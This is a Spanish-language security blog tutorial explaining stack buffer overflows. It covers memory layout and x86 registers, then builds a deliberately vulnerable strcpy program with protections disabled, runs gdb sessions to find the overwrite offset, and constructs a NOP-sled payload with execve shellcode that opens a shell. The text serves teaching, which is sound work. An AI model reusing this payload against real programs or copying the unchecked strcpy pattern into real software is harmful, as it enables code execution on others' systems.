<!DOCTYPE html>


<html lang="en-us" data-theme="">
<head>
    
        
<meta charset="utf-8">
<meta name="HandheldFriendly" content="True">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="referrer" content="no-referrer-when-downgrade">

<title>Buffer overflow - ins3cure.com</title>
<meta name="description" content="You&#39;d better check your S3 buckets before someone else does">

<link rel="icon" type="image/x-icon" href="https://ins3cure.com/favicon.ico">
<link rel="apple-touch-icon-precomposed" href="https://ins3cure.com/favicon.png">
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">


<script async src="https://www.googletagmanager.com/gtag/js?id=UA-168677970-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-168677970-1');
</script>




    





    
    
    

    
        <link rel="stylesheet" href="https://ins3cure.com/css/style.77f677c827f6d28cc36d9ebc5df12e45faaaf5475aa067dd6cc0c0485817a99c.css" integrity="sha256-d/Z3yCf20ozDbZ68XfEuRfqq9UdaoGfdbMDASFgXqZw=">
    





    





    
    
    

    
        <link rel="stylesheet" href="https://ins3cure.com/css/style.c6fed49e746b6647061b86d63e3ffc352542c1c94153560619db0da4f976fca2.css" integrity="sha256-xv7UnnRrZkcGG4bWPj/8NSVCwclBU1YGGdsNpPl2/KI=">
    





<meta property="og:title" content="Buffer overflow" />
<meta property="og:description" content="En este artículo intento explicar con ejemplos cómo funciona un desbordamiento de buffer o buffer overflow. Se trata de un tipo de vulnerabilidad que se explota escribiendo más allá del final de un buffer, de tal forma que se modifique la dirección de retorno y se ejecutando un código arbitrario." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://ins3cure.com/buffer-overflow/" /><meta property="og:image" content="https://ins3cure.com/images/og-featured.png"/><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2016-12-18T00:00:00+00:00" />
<meta property="article:modified_time" content="2016-12-18T00:00:00+00:00" />


<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://ins3cure.com/images/og-featured.png"/>

<meta name="twitter:title" content="Buffer overflow"/>
<meta name="twitter:description" content="En este artículo intento explicar con ejemplos cómo funciona un desbordamiento de buffer o buffer overflow. Se trata de un tipo de vulnerabilidad que se explota escribiendo más allá del final de un buffer, de tal forma que se modifique la dirección de retorno y se ejecutando un código arbitrario."/>










<script async src="https://www.googletagmanager.com/gtag/js?id=G-18687JCG0Q"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-18687JCG0Q');
</script>



    
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.css" />

</head>
<body>
    <a class="skip-main" href="#main">Skip to main content</a>
    <div class="container">
        <header class="common-header"> 
            
                <h1 class="site-title">
    <a href="/"><span class="cursor">% </span>ins3cure.com</a><span class="logo_cursor"></span>
</h1>

    <nav>
        
        
        <a class="" href="https://ins3cure.com/categories/" title="Categories">Categories</a>
        
        <a class="" href="https://ins3cure.com/tags/" title="Tags">Tags</a>
        
    </nav>


            
        </header>
        <main id="main" tabindex="-1"> 
            
    
    
    <article class="post">
        <header class="post-header">
            <h1 class="post-title">Buffer overflow</h1>
    </header>
    

    


<div class="post-info">
    
    <div class="post-date">Posted Sunday, Dec 18, 2016</div>
    

    <div class="post-taxonomies">
        
            <ul class="post-tags">
                
                    <li><a href="https://ins3cure.com/tags/buffer-overflow">#buffer overflow</a></li>
                
                    <li><a href="https://ins3cure.com/tags/exploit">#exploit</a></li>
                
                    <li><a href="https://ins3cure.com/tags/security">#security</a></li>
                
            </ul>
        
    </div>
</div>

        <div class="content">
            <p>En este artículo intento explicar con ejemplos cómo funciona un desbordamiento de buffer o buffer overflow. Se trata de un tipo de vulnerabilidad que se explota escribiendo más allá del final de un buffer, de tal forma que se modifique la dirección de retorno y se ejecutando un código arbitrario.</p>
<h2 id="organización-de-la-memoria-en-los-procesos">Organización de la memoria en los procesos</h2>
<p>Antes de nada es conveniente tener una cierta idea de cómo se organiza un proceso en memoria, qué es el stack, qué ocurre cuando se llama a una función y cuando se vuelve…</p>
<p><img src="/img/process_mem_organization.png" alt="Process Memory Organization"></p>
<p>El stack es una estructura LIFO en la que se almacenan los parámetros de llamada funciones, direcciones de retorno y variables locales a la función en ejecución. Crece “hacia abajo”, es decir, hacia direcciones bajas de memoria.</p>
<p>El heap, al contrario que el stack, crece hacia arriba. En él se almecena memoria reservada dinámicamente (como mediante malloc).</p>
<p>Los segmentos bss y data almacenan variables (globales y estáticas) no inicializadas e inicializadas respectivamente.</p>
<p>Finalmente, el segmento text contiene el código ejecutable.</p>
<h2 id="un-programa-vulnerable">Un programa vulnerable</h2>
<p>En este artículo intento explicar con ejemplos cómo funciona un desbordamiento de buffer o buffer overflow. Se trata de un tipo de vulnerabilidad que se explota escribiendo más allá del final de un buffer, de tal forma que se modifique la dirección de retorno y se ejecutando un código arbitrario.</p>
<h2 id="algunos-registros">Algunos registros</h2>
<p>Algunos registros que nos van a hacer falta son:</p>
<ul>
<li>%eip: Instruction Pointer Register. Almacena la dirección de la siguiente instrucción que se va a ejecutar.</li>
<li>%esp: Stack Pointer. Almacena la dirección del top de la pila. Es decir, como la pila crece “hacia abajo”, apunta a la dirección del último elemento almacenado en la pila.</li>
<li>%ebp: Base Pointer Register. Al principio de la función valdrá normalmente esp. Las direcciones de parámetros y variables locales hacen referencia a ebp mediante offsets que se añaden (parámetros) o sustraen (variables).</li>
</ul>
<h2 id="qué-ocurre-cuando-se-llama-a-una-función">¿Qué ocurre cuando se llama a una función?</h2>
<p>Pues pasan un montón de cosas que intento resumir:</p>
<ol>
<li>Se pasan los parámetros al stack en orden inverso (primero el de más a la derecha)</li>
<li>Se lleva al stack la dirección de la siguiente instrucción para que la función, una vez terminada, sepa dónde tiene que volver</li>
<li>Asignar a %eip la dirección de la función llamada para transferir el control a la misma</li>
<li>Guardar en el stack el valor de %ebp (para poder recuperarlo más adelante) y actualizarlo con %esp</li>
<li>Llevar las variables locales al stack; por supuesto, actualizando %esp por el camino.</li>
<li>Una vez finalizada la función, las cosas tienen que volver a estar como antes (es decir, recuperar el stack frame anterior). De modo que %esp toma el valor de %ebp y se recupera del stack el valor de %ebp que habíamos almacenado (el que tenía antes de transferir el control a la función)</li>
<li>Recuperar la dirección de retorno del stack y poner el valor en %eip para devolver el control a la función inicial.</li>
</ol>
<p>La cuestión es ¿qué ocurre si conseguimos manipular esa dirección de retorno? Que podríamos hacer que el programa saltase a una dirección donde hubiéramos almacenado un código “malicioso”.</p>
<h2 id="un-programa-vulnerable-1">Un programa vulnerable</h2>
<p>El programa del ejemplo siguiente contiene una vulnerabilidad:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-c" data-lang="c"><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;string.h&gt;</span><span style="color:#75715e">
</span><span style="color:#75715e"></span>
<span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span> (<span style="color:#66d9ef">int</span> argc, <span style="color:#66d9ef">char</span><span style="color:#f92672">**</span> argv)
{
	<span style="color:#66d9ef">char</span> buf[<span style="color:#ae81ff">500</span>];
	strcpy(buf, argv[<span style="color:#ae81ff">1</span>]);

	<span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
}
</code></pre></div><p>Hay una fución <code>strcpy</code> que copia datos sin validar los límites (como puede ocurrir con otras como <code>memcpy</code>, <code>gets</code>&hellip;) Es decir, se pueden copiar datos más allá del límite del buffer de destino si el origen es “más largo”, sobreescribiendo otros datos.</p>
<p>Ojo, tanto el sistema operativo como el compilador (<code>gcc</code> en particular) pueden implementar ciertas protecciones. Así que, para entender bien el proceso, las deshabilitaremos. Las protecciones no son insalvables pero dificultan la explotación y no tiene sentido pelearse con ellas por ahora.</p>
<p>De modo que, primero, deshabilitamos ASLR:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh">sudo echo <span style="color:#ae81ff">0</span> &gt; /proc/sys/kernel/randomize_va_space
</code></pre></div><p>Y compilaremos el programa anterior de la siguiente forma:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh">gcc -fno-stack-protector -z execstack <span style="color:#ae81ff">\
</span><span style="color:#ae81ff"></span>  -mpreferred-stack-boundary<span style="color:#f92672">=</span><span style="color:#ae81ff">2</span> -g -o vuln vuln.c
</code></pre></div><p>El programa no tiene mucho misterio, simplemente copia la cadena que se le pase sin siguiera sacarla por pantalla:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh">$ ./vuln Hola
</code></pre></div><p>Pero si este es mayor que el buffer buf</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh">$ ./vuln <span style="color:#66d9ef">$(</span>python -c <span style="color:#e6db74">&#39;print &#34;A&#34;*512&#39;</span><span style="color:#66d9ef">)</span>
Segmentation fault
</code></pre></div><h2 id="shellcodes">Shellcodes</h2>
<p>Un inciso: un shellcode es un conjunto de órdenes programadas generalmente en lenguaje ensamblador y trasladadas a opcodes (conjunto de valores hexadecimales) que suelen ser inyectadas en la pila (o stack) de ejecución de un programa para conseguir que la máquina en la que reside se ejecute la operación que se haya programado (copypaste de la Wikipedia)</p>
<p>No hace falta que nos rompamos la cabeza con esto, podemos usar uno ya disponible; este shellcode nos dará una shell con tan solo 28 bytes:</p>
<pre tabindex="0"><code>\x31\xc0\x50\x68\x2f\x2f\x73
\x68\x68\x2f\x62\x69\x6e\x89
\xe3\x89\xc1\x89\xc2\xb0\x0b
\xcd\x80\x31\xc0\x40\xcd\x80
</code></pre><p>Este será el código que tendremos que inyectar en la dirección de memoria a la que hagamos apuntar el registro eip</p>
<h2 id="la-ejecución">La ejecución</h2>
<p>Ya sabemos el código que vamos a inyectar; falta saber dónde, y componer las cosas de tal forma que hagamos que las posiciones de memoria sobreescritas apunten a donde necesitamos. En esta tarea nos ayudará el depurador gdb:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh">$ gdb -q ./vuln
Reading symbols from ./vuln...done.
<span style="color:#f92672">(</span>gdb<span style="color:#f92672">)</span> disass main
Dump of assembler code <span style="color:#66d9ef">for</span> <span style="color:#66d9ef">function</span> main:
   0x080483fb &lt;+0&gt;:	push   %ebp
   0x080483fc &lt;+1&gt;:	mov    %esp,%ebp
   0x080483fe &lt;+3&gt;:	sub    $0x1f4,%esp
   0x08048404 &lt;+9&gt;:	mov    0xc<span style="color:#f92672">(</span>%ebp<span style="color:#f92672">)</span>,%eax
   0x08048407 &lt;+12&gt;:	add    $0x4,%eax
   0x0804840a &lt;+15&gt;:	mov    <span style="color:#f92672">(</span>%eax<span style="color:#f92672">)</span>,%eax
   0x0804840c &lt;+17&gt;:	push   %eax
   0x0804840d &lt;+18&gt;:	lea    -0x1f4<span style="color:#f92672">(</span>%ebp<span style="color:#f92672">)</span>,%eax
   0x08048413 &lt;+24&gt;:	push   %eax
   0x08048414 &lt;+25&gt;:	call   0x80482d0 &lt;strcpy@plt&gt;
   0x08048419 &lt;+30&gt;:	add    $0x8,%esp
   0x0804841c &lt;+33&gt;:	mov    $0x0,%eax
   0x08048421 &lt;+38&gt;:	leave  
   0x08048422 &lt;+39&gt;:	ret    
End of assembler dump.
</code></pre></div><p>Le pedimos que nos muestre unos registros, establecemos un breakpoint a la vuelta de la función strcpy llamada y hacemos una ejecución “normal”:</p>
<pre tabindex="0"><code>(gdb) display $esp
(gdb) display $ebp
(gdb) b *0x08048419
Breakpoint 1 at 0x8048419: file vuln.c, line 7.
(gdb) run AAAA
Starting program: /home/luis/Projects/exploits/vuln AAAA

Breakpoint 1, 0x08048419 in main (argc=2, argv=0xbffff794) at vuln.c:7
7		strcpy(buf, argv[1]);
2: $ebp = (void *) 0xbffff6f8
1: $esp = (void *) 0xbffff4fc
(gdb) c
Continuing.
[Inferior 1 (process 8334) exited normally]
</code></pre><p>Veamos ahora lo que ocurre si llenamos el buffer;</p>
<pre tabindex="0"><code>(gdb) run $(python -c 'print &quot;A&quot;*508')
Starting program: /home/luis/Projects/exploits/vuln $(python -c 'print &quot;A&quot;*508')

Breakpoint 1, 0x08048419 in main (argc=0, argv=0xbffff594) at vuln.c:7
7		strcpy(buf, argv[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg
eax            0x0	0
ecx            0xbffff8d0	-1073743664
edx            0xbffff4f6	-1073744650
ebx            0xb7fcf000	-1208160256
esp            0xbffff500	0xbffff500
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x41414141	0x41414141
</code></pre><p>Un Segmentation Fault es la forma que tiene el procesador de decirnos que hemos hecho algo “ilegal”. En este caso, hemos sobreescrito la posición de memoria donde se guardaba la dirección de retorno de la función y la hemos convertido en 0x41414141, una dirección que no nos pertenece.</p>
<p>Para comprobar que nuestra suposición es correcta, cambiamos los últimos bytes de nuestra cadena por otros distintos y comprobamos que son los que aparecen en el registro eip:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh"><span style="color:#f92672">(</span>gdb<span style="color:#f92672">)</span> run <span style="color:#66d9ef">$(</span>python -c <span style="color:#e6db74">&#39;print &#34;A&#34;*504 + &#34;BBBB&#34;&#39;</span><span style="color:#66d9ef">)</span>
The program being debugged has been started already.
Start it from the beginning? <span style="color:#f92672">(</span>y or n<span style="color:#f92672">)</span> y
Starting program: /home/luis/Projects/exploits/vuln <span style="color:#66d9ef">$(</span>python -c <span style="color:#e6db74">&#39;print &#34;A&#34;*504 + &#34;BBBB&#34;&#39;</span><span style="color:#66d9ef">)</span>

Breakpoint 1, 0x08048419 in main <span style="color:#f92672">(</span>argc<span style="color:#f92672">=</span>0, argv<span style="color:#f92672">=</span>0xbffff594<span style="color:#f92672">)</span> at vuln.c:7
7		strcpy<span style="color:#f92672">(</span>buf, argv<span style="color:#f92672">[</span>1<span style="color:#f92672">])</span>;
<span style="color:#f92672">(</span>gdb<span style="color:#f92672">)</span> c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? <span style="color:#f92672">()</span>
</code></pre></div><p>En este caso tenemos 0x42424242, como esperábamos.</p>
<h2 id="el-ataque">El ataque</h2>
<p>Comprobado que el programa es vulnerable, ahora se trata de sacar provecho del error. El objetivo es inyectar el shellcode en una dirección conocida y forzar al registro eip a apuntar a esa dirección.</p>
<p>El primer paso será conocer las direcciones de memoria donde se almacena nuestro payload. Para ello usamos de nuevo gdb:</p>
<pre tabindex="0"><code>(gdb) run $(python -c 'print &quot;A&quot;*504 + &quot;BBBB&quot;')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/luis/Projects/exploits/vuln $(python -c 'print &quot;A&quot;*504 + &quot;BBBB&quot;')

Breakpoint 1, 0x08048419 in main (argc=0, argv=0xbffff594) at vuln.c:7
7		strcpy(buf, argv[1]);
(gdb) x/100wx $esp
0xbffff2fc:	0xbffff304	0xbffff6de	0x41414141	0x41414141
0xbffff30c:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffff31c:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffff32c:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffff33c:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffff34c:	0x41414141	0x41414141	0x41414141	0x41414141
[...]
0xbffff4cc:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffff4dc:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffff4ec:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffff4fc:	0x42424242	0x00000000	0xbffff594	0xbffff5a0
[...]
</code></pre><p>Vemos que nuestra cadena de &ldquo;Aes” comienza en 0xbffff308 (0xbffff2fc + 8). Podemos inyectar ahí el shellcode y apuntar con cuidado a esa dirección, pero hay técnicas que facilitan las cosas; en lugar de “Aes” vamos a usar el carácter 0x90 que corresponde con el código de opecación NOP, es decir, “saltar a la siguiente instrucción”. Si llenamos todo de NOPs da igual dónde caigamos, porque el procesador saltará a la instrucción siguiente hasta ejecutar el payload. Así que nuestra cadena será algo como:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-py" data-lang="py"><span style="color:#960050;background-color:#1e0010">$</span>(python <span style="color:#f92672">-</span>c <span style="color:#e6db74">&#39;print &#34;</span><span style="color:#ae81ff">\x90</span><span style="color:#e6db74">&#34;*436 + &#34;</span><span style="color:#ae81ff">\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80</span><span style="color:#e6db74">&#34; + &#34;</span><span style="color:#ae81ff">\x90</span><span style="color:#e6db74">&#34;*10 + &#34;BBBB&#34;&#39;</span>)
</code></pre></div><p>Simplemente hemos sustituído unos cuantos \x90 por el shellcode que vamos a utilizar. Si lo ejecutamos, comprobamos que todo sigue como estaba, así que no nos hemos equivocado:</p>
<pre tabindex="0"><code>(gdb) run $(python -c 'print &quot;\x90&quot;*466 + &quot;\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80&quot; + &quot;\x90&quot;*10 + &quot;BBBB&quot;')
Starting program: /home/luis/Projects/exploits/vuln $(python -c 'print &quot;\x90&quot;*466 + &quot;\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80&quot; + &quot;\x90&quot;*10 + &quot;BBBB&quot;')

Breakpoint 1, 0x08048419 in main (argc=0, argv=0xbffff594) at vuln.c:7
7		strcpy(buf, argv[1]);
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
</code></pre><p>Finalmente, sustituimos la cadena “BBBB” por una dirección de memoria de la zona que hemos llenado de NOPs; así, si hay algún pequeño cambio en la disposición del stack, el exploit seguirá funcionando. Ojo, la arquitectura Intel es little endian, es decir, tendremos que introducir la dirección de memoria empezando por el byte menos significativo:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-py" data-lang="py"><span style="color:#960050;background-color:#1e0010">$</span>(python <span style="color:#f92672">-</span>c <span style="color:#e6db74">&#39;print &#34;</span><span style="color:#ae81ff">\x90</span><span style="color:#e6db74">&#34;*466 + &#34;</span><span style="color:#ae81ff">\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80</span><span style="color:#e6db74">&#34; + &#34;</span><span style="color:#ae81ff">\x90</span><span style="color:#e6db74">&#34;*10 + &#34;</span><span style="color:#ae81ff">\xac\xf3\xff\xbf</span><span style="color:#e6db74">&#34;&#39;</span>)
</code></pre></div><p>Vamos:</p>
<pre tabindex="0"><code>(gdb) run $(python -c 'print &quot;\x90&quot;*466 + &quot;\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80&quot; + &quot;\x90&quot;*10 + &quot;\xac\xf3\xff\xbf&quot;')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/luis/Projects/exploits/vuln $(python -c 'print &quot;\x90&quot;*466 + &quot;\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80&quot; + &quot;\x90&quot;*10 + &quot;\xac\xf3\xff\xbf&quot;')

Breakpoint 1, 0x08048419 in main (argc=0, argv=0xbffff594) at vuln.c:7
7		strcpy(buf, argv[1]);
(gdb) c
Continuing.
process 8410 is executing new program: /bin/dash
</code></pre><p>¡Premio! Tenemos la shell. Fuera del <code>gdb</code> también funciona, claro:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sh" data-lang="sh">user@debian8-x86:~/exploits$ ./vuln <span style="color:#66d9ef">$(</span>python -c <span style="color:#e6db74">&#39;print &#34;\x90&#34;*466 + &#34;\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80&#34; + &#34;\x90&#34;*10 + &#34;\xac\xf3\xff\xbf&#34;&#39;</span><span style="color:#66d9ef">)</span>
$
</code></pre></div>
        </div>
    </article>

    
        
    <div class="pagination post-pagination">
        <div class="left pagination-item ">
            
                <a href="/como-funciona-rsa/">← Cómo funciona RSA</a>
            
        </div>
        <div class="right pagination-item ">
            
                <a href="/saltandose-los-controles-de-la-powershell/">Saltándose los controles de la Powershell →</a>
            
        </div>
    </div>

    

    
        <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "ins3cure-com" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
    


        </main>
        
            <footer class="common-footer">
    
    

    <div class="common-footer-bottom">
        
        <div class="copyright">
            <p>Mandatory legal stuff:
            <a href="/legal">Legal notice</a> · 
            <a href="/privacy">Privacy policy</a> · 
            <a href="/cookies">Cookie policy</a><br>
            © ins3cure.com, 2022 · <a href="/about">About us</a><br>
            Powered by <a target="_blank" rel="noopener noreferrer" href="https://gohugo.io/">Hugo</a>, theme based on <a target="_blank" rel="noopener noreferrer" href="https://github.com/mitrichius/hugo-theme-anubis">Anubis</a>.
            </p>  
        </div> 

        

    



    <button class="theme-switcher">
        Dark theme
    </button>

    <script>
    const STORAGE_KEY = 'user-color-scheme'
    const defaultTheme = "auto"

    let currentTheme
    let switchButton
    let autoDefinedScheme = window.matchMedia('(prefers-color-scheme: dark)')

    const autoChangeScheme = e => {
        currentTheme = e.matches ? 'dark' : 'light'
        document.documentElement.setAttribute('data-theme', currentTheme)
        changeButtonText()
    }

    document.addEventListener('DOMContentLoaded', function() {
        switchButton = document.querySelector('.theme-switcher')
        currentTheme = detectCurrentScheme()
        if (currentTheme == 'dark') {
            document.documentElement.setAttribute('data-theme', 'dark')
        }
        if (currentTheme == 'auto') {
            autoChangeScheme(autoDefinedScheme);
            autoDefinedScheme.addListener(autoChangeScheme);
        }
        changeButtonText()
        switchButton.addEventListener('click', switchTheme, false)
    })

    function detectCurrentScheme() {
        if (localStorage.getItem(STORAGE_KEY)) {
            return localStorage.getItem(STORAGE_KEY)
        } 
        if (defaultTheme) {
            return defaultTheme
        } 
        if (!window.matchMedia) {
            return 'light'
        } 
        if (window.matchMedia('(prefers-color-scheme: dark)').matches) {
            return 'dark'
        }
        return 'light'
    }

    function changeButtonText()
    {   
        switchButton.textContent = currentTheme == 'dark' ?  "Light theme" : "Dark theme"
    }

    function switchTheme(e) {
        if (currentTheme == 'dark') {
            localStorage.setItem(STORAGE_KEY, 'light')
            document.documentElement.setAttribute('data-theme', 'light')
            currentTheme = 'light'
        } else {
            localStorage.setItem(STORAGE_KEY, 'dark')
            document.documentElement.setAttribute('data-theme', 'dark')
            currentTheme = 'dark'
        }
        changeButtonText()
    }
    </script>
   
    </div>
</footer>

        
    </div>
    <script src="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.js" data-cfasync="false"></script>
<script>
window.cookieconsent.initialise({
  "palette": {
    "popup": {
      "background": "#252e39"
    },
    "button": {
      "background": "#14a7d0"
    }
  },
  "theme": "classic",
  "content": {
    "message": "This website uses cookies to ensure you get the best experience on our website",
    "dismiss": "Got it!",
    "link": "Learn more",
    "href": "/cookiepolicy"
  }
});
</script>
</body>
</html>
